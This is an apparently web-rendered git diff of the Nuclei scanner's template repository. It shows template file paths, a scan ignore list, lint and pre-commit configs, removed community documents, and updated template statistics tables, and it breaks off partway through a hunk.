code/privilege-escalation/linux/binary/privesc-strace.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-tar.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-tcsh.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-time.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-timeout.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-tmate.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-torify.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-torsocks.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-unshare.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-vi.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-view.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-vim.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-xargs.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-xdg-user-dir.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-yash.yaml
|
|
||||||
code/privilege-escalation/linux/binary/privesc-zsh.yaml
|
|
||||||
code/privilege-escalation/linux/rw-shadow.yaml
|
|
||||||
code/privilege-escalation/linux/rw-sudoers.yaml
|
|
||||||
code/privilege-escalation/linux/sudo-nopasswd.yaml
|
|
||||||
code/privilege-escalation/linux/writable-etc-passwd.yaml
|
|
||||||
dns/dns-rebinding.yaml
|
|
||||||
http/cves/2018/CVE-2018-10942.yaml
|
|
||||||
http/cves/2023/CVE-2023-22527.yaml
|
|
||||||
http/cves/2023/CVE-2023-27639.yaml
|
|
||||||
http/cves/2023/CVE-2023-27640.yaml
|
|
||||||
http/cves/2023/CVE-2023-47211.yaml
|
|
||||||
http/cves/2023/CVE-2023-48023.yaml
|
|
||||||
http/cves/2023/CVE-2023-6023.yaml
|
|
||||||
http/cves/2023/CVE-2023-6875.yaml
|
|
||||||
http/cves/2024/CVE-2024-0204.yaml
|
|
||||||
http/default-logins/node-red/nodered-default-login.yaml
|
|
||||||
http/default-logins/powershell/powershell-default-login.yaml
|
|
||||||
http/exposed-panels/autoset-detect.yaml
|
|
||||||
http/exposed-panels/compalex-detect.yaml
|
|
||||||
http/exposed-panels/doris-panel.yaml
|
|
||||||
http/exposures/configs/vbulletin-path-disclosure.yaml
|
|
||||||
http/exposures/logs/go-pprof-debug.yaml
|
|
||||||
http/miscellaneous/defacement-detect.yaml
|
|
||||||
http/misconfiguration/doris-dashboard.yaml
|
|
||||||
http/vulnerabilities/apache/apache-nifi-rce.yaml
|
|
||||||
http/vulnerabilities/juniper/junos-xss.yaml
|
|
||||||
http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml
|
|
||||||
http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml
|
|
||||||
|
|
|
@ -0,0 +1,31 @@
|
||||||
|
# ==| Nuclei Templates Ignore list |==
|
||||||
|
# ====================================
|
||||||
|
#
|
||||||
|
# This is default list of tags and files to excluded from default nuclei scan.
|
||||||
|
# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
|
||||||
|
#
|
||||||
|
# ============ DO NOT EDIT ============
|
||||||
|
# Automatically updated by nuclei on execution from nuclei-templates
|
||||||
|
# User changes should be in nuclei config file
|
||||||
|
# ============ DO NOT EDIT ============
|
||||||
|
|
||||||
|
# tags is a list of tags to ignore execution for
|
||||||
|
# unless asked for by the user.
|
||||||
|
|
||||||
|
tags:
|
||||||
|
- "fuzz"
|
||||||
|
- "dos"
|
||||||
|
|
||||||
|
# The following templates have been excluded because they have weak matchers and may generate FP results.
|
||||||
|
# Please feel free to create PR if you can update the templates with strict matchers.
|
||||||
|
|
||||||
|
# files is a list of files to ignore template execution
|
||||||
|
# unless asked for by the user.
|
||||||
|
|
||||||
|
files:
|
||||||
|
- http/cves/2006/CVE-2006-1681.yaml
|
||||||
|
- http/cves/2019/CVE-2019-14696.yaml
|
||||||
|
- http/cves/2020/CVE-2020-2036.yaml
|
||||||
|
- http/cves/2020/CVE-2020-28351.yaml
|
||||||
|
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
|
||||||
|
- http/cves/2021/CVE-2021-28164.yaml
|
|
@ -0,0 +1,10 @@
|
||||||
|
repos:
|
||||||
|
- repo: https://github.com/pre-commit/pre-commit-hooks
|
||||||
|
rev: v2.3.0
|
||||||
|
hooks:
|
||||||
|
- id: end-of-file-fixer
|
||||||
|
- id: trailing-whitespace
|
||||||
|
- repo: https://github.com/adrienverge/yamllint.git
|
||||||
|
rev: v1.17.0
|
||||||
|
hooks:
|
||||||
|
- id: yamllint
|
|
@ -0,0 +1,26 @@
|
||||||
|
---
|
||||||
|
extends: default
|
||||||
|
|
||||||
|
ignore: |
|
||||||
|
.pre-commit-config.yml
|
||||||
|
.github/
|
||||||
|
.git/
|
||||||
|
*.yml
|
||||||
|
|
||||||
|
rules:
|
||||||
|
document-start: disable
|
||||||
|
comments-indentation: disable
|
||||||
|
line-length: disable
|
||||||
|
new-lines: disable
|
||||||
|
new-line-at-end-of-file: disable
|
||||||
|
truthy: disable
|
||||||
|
comments:
|
||||||
|
require-starting-space: true
|
||||||
|
ignore-shebangs: true
|
||||||
|
min-spaces-from-content: 1
|
||||||
|
empty-lines:
|
||||||
|
max: 5
|
||||||
|
braces:
|
||||||
|
forbid: true
|
||||||
|
brackets:
|
||||||
|
forbid: true
|
|
@ -1,76 +0,0 @@
|
||||||
# Contributor Covenant Code of Conduct
|
|
||||||
|
|
||||||
## Our Pledge
|
|
||||||
|
|
||||||
In the interest of fostering an open and welcoming environment, we as
|
|
||||||
contributors and maintainers pledge to making participation in our project and
|
|
||||||
our community a harassment-free experience for everyone, regardless of age, body
|
|
||||||
size, disability, ethnicity, sex characteristics, gender identity and expression,
|
|
||||||
level of experience, education, socio-economic status, nationality, personal
|
|
||||||
appearance, race, religion, or sexual identity and orientation.
|
|
||||||
|
|
||||||
## Our Standards
|
|
||||||
|
|
||||||
Examples of behavior that contributes to creating a positive environment
|
|
||||||
include:
|
|
||||||
|
|
||||||
* Using welcoming and inclusive language
|
|
||||||
* Being respectful of differing viewpoints and experiences
|
|
||||||
* Gracefully accepting constructive criticism
|
|
||||||
* Focusing on what is best for the community
|
|
||||||
* Showing empathy towards other community members
|
|
||||||
|
|
||||||
Examples of unacceptable behavior by participants include:
|
|
||||||
|
|
||||||
* The use of sexualized language or imagery and unwelcome sexual attention or
|
|
||||||
advances
|
|
||||||
* Trolling, insulting/derogatory comments, and personal or political attacks
|
|
||||||
* Public or private harassment
|
|
||||||
* Publishing others' private information, such as a physical or electronic
|
|
||||||
address, without explicit permission
|
|
||||||
* Other conduct which could reasonably be considered inappropriate in a
|
|
||||||
professional setting
|
|
||||||
|
|
||||||
## Our Responsibilities
|
|
||||||
|
|
||||||
Project maintainers are responsible for clarifying the standards of acceptable
|
|
||||||
behavior and are expected to take appropriate and fair corrective action in
|
|
||||||
response to any instances of unacceptable behavior.
|
|
||||||
|
|
||||||
Project maintainers have the right and responsibility to remove, edit, or
|
|
||||||
reject comments, commits, code, wiki edits, issues, and other contributions
|
|
||||||
that are not aligned to this Code of Conduct, or to ban temporarily or
|
|
||||||
permanently any contributor for other behaviors that they deem inappropriate,
|
|
||||||
threatening, offensive, or harmful.
|
|
||||||
|
|
||||||
## Scope
|
|
||||||
|
|
||||||
This Code of Conduct applies both within project spaces and in public spaces
|
|
||||||
when an individual is representing the project or its community. Examples of
|
|
||||||
representing a project or community include using an official project e-mail
|
|
||||||
address, posting via an official social media account, or acting as an appointed
|
|
||||||
representative at an online or offline event. Representation of a project may be
|
|
||||||
further defined and clarified by project maintainers.
|
|
||||||
|
|
||||||
## Enforcement
|
|
||||||
|
|
||||||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
|
||||||
reported by contacting the project team at contact@projectdiscovery.io. All
|
|
||||||
complaints will be reviewed and investigated and will result in a response that
|
|
||||||
is deemed necessary and appropriate to the circumstances. The project team is
|
|
||||||
obligated to maintain confidentiality with regard to the reporter of an incident.
|
|
||||||
Further details of specific enforcement policies may be posted separately.
|
|
||||||
|
|
||||||
Project maintainers who do not follow or enforce the Code of Conduct in good
|
|
||||||
faith may face temporary or permanent repercussions as determined by other
|
|
||||||
members of the project's leadership.
|
|
||||||
|
|
||||||
## Attribution
|
|
||||||
|
|
||||||
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
|
|
||||||
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
|
|
||||||
|
|
||||||
[homepage]: https://www.contributor-covenant.org
|
|
||||||
|
|
||||||
For answers to common questions about this code of conduct, see
|
|
||||||
https://www.contributor-covenant.org/faq
|
|
|
@ -1,100 +0,0 @@
|
||||||
# Template Contribution Guidelines
|
|
||||||
|
|
||||||
This documentation contains a set of guidelines to help you during the contribution process.
|
|
||||||
We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project.
|
|
||||||
Thank you for helping out and remember, **no contribution is too small.**
|
|
||||||
|
|
||||||
# Submitting Nuclei Templates 👩💻👨💻
|
|
||||||
|
|
||||||
Below you will find the process and workflow used to review and merge your changes.
|
|
||||||
|
|
||||||
## Step 1 : Find existing templates
|
|
||||||
|
|
||||||
- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one.
|
|
||||||
- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work.
|
|
||||||
- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template.
|
|
||||||
|
|
||||||
## Step 2 : Fork the Project
|
|
||||||
|
|
||||||
- Fork this Repository. This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote.
|
|
||||||
|
|
||||||
<img width="928" alt="template-fork" src="https://user-images.githubusercontent.com/8293321/124467966-2afde200-ddb6-11eb-835f-8f8fc2fabedb.png">
|
|
||||||
|
|
||||||
```sh
|
|
||||||
git clone https://github.com/<your-username>/nuclei-templates
|
|
||||||
cd nuclei-templates
|
|
||||||
git remote add upstream https://github.com/projectdiscovery/nuclei-templates
|
|
||||||
```
|
|
||||||
|
|
||||||
- If you have already forked the project, update your copy before working.
|
|
||||||
|
|
||||||
```sh
|
|
||||||
git remote update
|
|
||||||
git checkout main
|
|
||||||
git rebase upstream/main
|
|
||||||
```
|
|
||||||
|
|
||||||
## Step 3 : Create your Template Branch
|
|
||||||
|
|
||||||
Create a new branch. Use its name to identify the issue your addressing.
|
|
||||||
|
|
||||||
```sh
|
|
||||||
# It will create a new branch with name template_branch_name and switch to that branch
|
|
||||||
git checkout -b template_branch_name
|
|
||||||
```
|
|
||||||
|
|
||||||
## Step 4 : Create Template and Commit
|
|
||||||
- Create your template.
|
|
||||||
- Add all the files/folders needed.
|
|
||||||
- After you've made changes or completed template creation, add changes to the branch you've just created by:
|
|
||||||
|
|
||||||
```sh
|
|
||||||
# To add all new files to branch template_branch_name
|
|
||||||
git add .
|
|
||||||
```
|
|
||||||
|
|
||||||
- To commit, give a descriptive message for the convenience of the reviewer by:
|
|
||||||
|
|
||||||
```sh
|
|
||||||
# This message get associated with all files you have changed
|
|
||||||
git commit -m "Added/Fixed/Updated XXX Template"
|
|
||||||
```
|
|
||||||
|
|
||||||
**NOTE**:
|
|
||||||
|
|
||||||
- A Pull Request should have only one unique template to make it simple for review.
|
|
||||||
- Multiple templates for same technology can be grouped into single Pull Request.
|
|
||||||
|
|
||||||
|
|
||||||
## Step 5 : Push Your Changes
|
|
||||||
|
|
||||||
- Now you are ready to push your template to the remote (forked) repository.
|
|
||||||
- When your work is ready and complies with the project conventions, upload your changes to your fork:
|
|
||||||
|
|
||||||
```sh
|
|
||||||
# To push your work to your remote repository
|
|
||||||
git push -u origin template_branch_name
|
|
||||||
```
|
|
||||||
|
|
||||||
## Step 6 : Pull Request
|
|
||||||
|
|
||||||
- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to your pull request, that describes the purpose of the template.
|
|
||||||
- Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳
|
|
||||||
|
|
||||||
## Need more help?🤔
|
|
||||||
|
|
||||||
You can refer to the following articles of Git and GitHub basics. In case you are stuck, feel free to contact the Project Mentors and Community by joining [PD Community](https://discord.gg/projectdiscovery) Discord server.
|
|
||||||
|
|
||||||
- [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo)
|
|
||||||
- [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request)
|
|
||||||
- [How to create a Pull Request](https://opensource.com/article/19/7/create-pull-request-github)
|
|
||||||
- [Getting started with Git and GitHub](https://towardsdatascience.com/getting-started-with-git-and-github-6fcd0f2d4ac6)
|
|
||||||
- [Learn GitHub from Scratch](https://lab.github.com/githubtraining/introduction-to-github)
|
|
||||||
|
|
||||||
|
|
||||||
## Tip from us😇
|
|
||||||
|
|
||||||
- **Nuclei** outcomes are only as excellent as **template matchers💡**
|
|
||||||
- Declare at least two matchers to reduce false positive
|
|
||||||
- Avoid matching words reflected in the URL to reduce false positive
|
|
||||||
- Avoid short word that could be encountered anywhere
|
|
21
LICENSE 2.md
21
LICENSE 2.md
|
@ -1,21 +0,0 @@
|
||||||
MIT License
|
|
||||||
|
|
||||||
Copyright (c) 2020 ProjectDiscovery, Inc.
|
|
||||||
|
|
||||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
|
||||||
of this software and associated documentation files (the "Software"), to deal
|
|
||||||
in the Software without restriction, including without limitation the rights
|
|
||||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
|
||||||
copies of the Software, and to permit persons to whom the Software is
|
|
||||||
furnished to do so, subject to the following conditions:
|
|
||||||
|
|
||||||
The above copyright notice and this permission notice shall be included in all
|
|
||||||
copies or substantial portions of the Software.
|
|
||||||
|
|
||||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
|
||||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
|
||||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
|
||||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
|
||||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
|
||||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
|
||||||
SOFTWARE.
|
|
|
@ -1,28 +0,0 @@
|
||||||
### Template / PR Information
|
|
||||||
|
|
||||||
<!-- Explains the information and/or motivation for update or/ creating this templates -->
|
|
||||||
<!-- Please include any reference to your template if available -->
|
|
||||||
|
|
||||||
- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
|
|
||||||
- References:
|
|
||||||
|
|
||||||
### Template Validation
|
|
||||||
|
|
||||||
I've validated this template locally?
|
|
||||||
- [ ] YES
|
|
||||||
- [ ] NO
|
|
||||||
|
|
||||||
|
|
||||||
#### Additional Details (leave it blank if not applicable)
|
|
||||||
|
|
||||||
<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
|
|
||||||
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
|
|
||||||
<!-- Please do NOT include vulnerable host information in pull requests -->
|
|
||||||
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
|
|
||||||
|
|
||||||
### Additional References:
|
|
||||||
|
|
||||||
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
|
|
||||||
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
|
|
||||||
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
|
|
||||||
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
||||||
| cve | 2318 | dhiyaneshdk | 1135 | http | 6947 | info | 3351 | file | 312 |
|
| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
|
||||||
| panel | 1040 | dwisiswant0 | 801 | file | 312 | high | 1471 | dns | 20 |
|
| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
|
||||||
| wordpress | 941 | daffainfo | 789 | workflows | 191 | medium | 1445 | | |
|
| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
|
||||||
| xss | 851 | pikpikcu | 353 | network | 132 | critical | 933 | | |
|
| xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
|
||||||
| exposure | 850 | pussycat0x | 313 | ssl | 27 | low | 251 | | |
|
| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
|
||||||
| wp-plugin | 815 | ritikchaddha | 298 | javascript | 25 | unknown | 34 | | |
|
| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
|
||||||
| osint | 678 | pdteam | 286 | dns | 17 | | | | |
|
| osint | 677 | pdteam | 286 | dns | 17 | | | | |
|
||||||
| tech | 650 | ricardomaia | 229 | headless | 11 | | | | |
|
| tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
|
||||||
| lfi | 622 | geeknik | 225 | cloud | 9 | | | | |
|
| lfi | 619 | geeknik | 224 | code | 3 | | | | |
|
||||||
| edb | 598 | theamanrawat | 221 | code | 5 | | | | |
|
| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |
|
||||||
|
|
||||||
**545 directories, 7957 files**.
|
**534 directories, 7902 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -1,96 +0,0 @@
|
||||||
|
|
||||||
|
|
||||||
<h1 align="center">
|
|
||||||
Nuclei 템플릿
|
|
||||||
</h1>
|
|
||||||
<h4 align="center">커뮤니티에서 엄선한, 애플리케이션 보안 취약점을 찾기 위한 Nuclei 엔진용 템플릿 목록</h4>
|
|
||||||
|
|
||||||
|
|
||||||
<p align="center">
|
|
||||||
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
|
|
||||||
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
|
|
||||||
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
|
|
||||||
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
|
|
||||||
</p>
|
|
||||||
|
|
||||||
<p align="center">
|
|
||||||
<a href="https://nuclei.projectdiscovery.io/templating-guide/">가이드 문서</a> •
|
|
||||||
<a href="#-contributions">기여</a> •
|
|
||||||
<a href="#-discussion">논의</a> •
|
|
||||||
<a href="#-community">커뮤니티</a> •
|
|
||||||
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
|
|
||||||
<a href="https://discord.gg/projectdiscovery">디스코드</a>
|
|
||||||
</p>
|
|
||||||
|
|
||||||
<p align="center">
|
|
||||||
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README.md">English</a> •
|
|
||||||
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README_KR.md">한국어</a>
|
|
||||||
</p>
|
|
||||||
|
|
||||||
----
|
|
||||||
|
|
||||||
템플릿은 실제 스캐닝 엔진을 동작하게 하는 [nuclei scanner](https://github.com/projectdiscovery/nuclei)의 핵심입니다.
|
|
||||||
이 저장소는 우리 팀에서 제공하거나, 커뮤니티에서 기여한 다양한 템플릿들을 저장하고 보관합니다.
|
|
||||||
템플릿 목록을 증가시키기 위해서 **pull requests** 나 [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) 를 통해 기여해주시기를 부탁드립니다.
|
|
||||||
|
|
||||||
## Nuclei 템플릿 개요
|
|
||||||
|
|
||||||
고유 태그, 작성자, 디렉토리, 심각도, 템플릿 종류에 대한 통계를 포함하고 있는 nuclei 템플릿의 개요입니다. 아래 표는 각 지표의 상위 10개 항목을 나타내고 있습니다. 더 자세한 정보는 [이곳](TEMPLATES-STATS.md)에서 확인 가능하고, [JSON](TEMPLATES-STATS.json) 형식으로도 확인 가능합니다.
|
|
||||||
|
|
||||||
<table>
|
|
||||||
<tr>
|
|
||||||
<td>
|
|
||||||
|
|
||||||
## Nuclei 템플릿 통계 Top 10
|
|
||||||
|
|
||||||
| 태그 | 개수 | 작성자 | 개수 | 디렉토리 | 개수 | 심각도 | 개수 | 종류 | 개수 |
|
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|
||||||
| cve | 1325 | daffainfo | 629 | cves | 1306 | info | 1398 | http | 3644 |
|
|
||||||
| panel | 604 | dhiyaneshdk | 509 | exposed-panels | 613 | high | 955 | file | 76 |
|
|
||||||
| lfi | 490 | pikpikcu | 322 | vulnerabilities | 506 | medium | 784 | network | 50 |
|
|
||||||
| xss | 451 | pdteam | 269 | technologies | 273 | critical | 445 | dns | 17 |
|
|
||||||
| wordpress | 409 | geeknik | 187 | exposures | 254 | low | 211 | | |
|
|
||||||
| exposure | 360 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
|
|
||||||
| cve2021 | 324 | 0x_akoko | 157 | misconfiguration | 210 | | | | |
|
|
||||||
| rce | 319 | princechaddha | 149 | workflows | 187 | | | | |
|
|
||||||
| wp-plugin | 304 | pussycat0x | 130 | default-logins | 102 | | | | |
|
|
||||||
| tech | 286 | gy741 | 126 | file | 76 | | | | |
|
|
||||||
|
|
||||||
**286개 디렉토리, 4012개 파일**.
|
|
||||||
|
|
||||||
</td>
|
|
||||||
</tr>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
📖 문서
|
|
||||||
-----
|
|
||||||
|
|
||||||
새 템플릿이나 사용자 정의 템플릿을 빌드하기 위한 자세한 문서는 https://nuclei.projectdiscovery.io 에서 확인할 수 있습니다. 작업 방식의 이해를 돕기 위한 템플릿들도 있습니다.
|
|
||||||
|
|
||||||
💪 기여
|
|
||||||
-----
|
|
||||||
|
|
||||||
Nuclei 템플릿은 커뮤니티의 기여로 동작합니다.
|
|
||||||
[템플릿 기여](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [기능 요청](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+), [버그 제보](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)는 언제든지 환영합니다.
|
|
||||||
|
|
||||||
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
|
|
||||||
|
|
||||||
💬 논의
|
|
||||||
-----
|
|
||||||
|
|
||||||
같이 이야기하고 싶은 질문, 의문 혹은 아이디어가 있으신가요?
|
|
||||||
[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) 에서 자유롭게 시작할 수 있습니다.
|
|
||||||
|
|
||||||
👨💻 커뮤니티
|
|
||||||
-----
|
|
||||||
|
|
||||||
프로젝트 관리자와 직접 논의하고 보안과 자동화 관련 사항을 다른 사람과 공유하기 위해 [Discord Community](https://discord.gg/projectdiscovery) 에 참여하는 것을 환영합니다. 추가로 Nuclei 에 대한 모든 정보를 업데이트 하기 위해 [트위터](https://twitter.com/pdnuclei) 팔로우를 할 수 있습니다.
|
|
||||||
|
|
||||||
<p align="center">
|
|
||||||
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
|
|
||||||
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
|
|
||||||
</a>
|
|
||||||
</p>
|
|
||||||
|
|
||||||
여러분의 기여와 커뮤니티의 활성화를 위한 노력에 다시한번 감사드립니다.
|
|
||||||
:heart:
|
|
File diff suppressed because one or more lines are too long
4909
TEMPLATES-STATS 2.md
4909
TEMPLATES-STATS 2.md
File diff suppressed because it is too large
Load Diff
File diff suppressed because one or more lines are too long
9741
TEMPLATES-STATS.md
9741
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
12
TOP-10 2.md
12
TOP-10 2.md
|
@ -1,12 +0,0 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
|
||||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
|
||||||
| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
|
|
||||||
| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
|
|
||||||
| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
|
|
||||||
| xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
|
|
||||||
| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
|
|
||||||
| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
|
|
||||||
| osint | 677 | pdteam | 286 | dns | 17 | | | | |
|
|
||||||
| tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
|
|
||||||
| lfi | 619 | geeknik | 224 | code | 3 | | | | |
|
|
||||||
| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |
|
|
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
||||||
| cve | 2318 | dhiyaneshdk | 1135 | http | 6947 | info | 3351 | file | 312 |
|
| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
|
||||||
| panel | 1040 | dwisiswant0 | 801 | file | 312 | high | 1471 | dns | 20 |
|
| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
|
||||||
| wordpress | 941 | daffainfo | 789 | workflows | 191 | medium | 1445 | | |
|
| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
|
||||||
| xss | 851 | pikpikcu | 353 | network | 132 | critical | 933 | | |
|
| xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
|
||||||
| exposure | 850 | pussycat0x | 313 | ssl | 27 | low | 251 | | |
|
| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
|
||||||
| wp-plugin | 815 | ritikchaddha | 298 | javascript | 25 | unknown | 34 | | |
|
| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
|
||||||
| osint | 678 | pdteam | 286 | dns | 17 | | | | |
|
| osint | 677 | pdteam | 286 | dns | 17 | | | | |
|
||||||
| tech | 650 | ricardomaia | 229 | headless | 11 | | | | |
|
| tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
|
||||||
| lfi | 622 | geeknik | 225 | cloud | 9 | | | | |
|
| lfi | 619 | geeknik | 224 | code | 3 | | | | |
|
||||||
| edb | 598 | theamanrawat | 221 | code | 5 | | | | |
|
| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |
|
||||||
|
|
|
@ -8,8 +8,7 @@ info:
|
||||||
Searches for Azure virtual machines via their registered DNS names.
|
Searches for Azure virtual machines via their registered DNS names.
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: cloud,enum,cloud-enum,azure,fuzz
|
tags: cloud,enum,cloud-enum,azure
|
||||||
|
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
||||||
|
@ -63,4 +62,4 @@ dns:
|
||||||
part: answer
|
part: answer
|
||||||
words:
|
words:
|
||||||
- "IN\tA"
|
- "IN\tA"
|
||||||
# digest: 4b0a00483046022100f91b6621181f8a7317c1ffc179ec2b81e33c8dd0dd28cc4871b13ffbb794ce84022100e7424a97fab1f6b745d735e7dad8f13b08ad36732b24216ae2826611af634318:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a004830460221008d223bfdb3585e335e8282ca206945a6f7704dab4a2899d3410229bf0db7132d022100b9de9af2b393a559575b67a5b25b6334fe8cddd1ceed5059ee634dc3b0292d50:922c64590222798bb761d5b6d8e72950
|
|
@ -33,4 +33,4 @@ http:
|
||||||
- 200
|
- 200
|
||||||
- 302
|
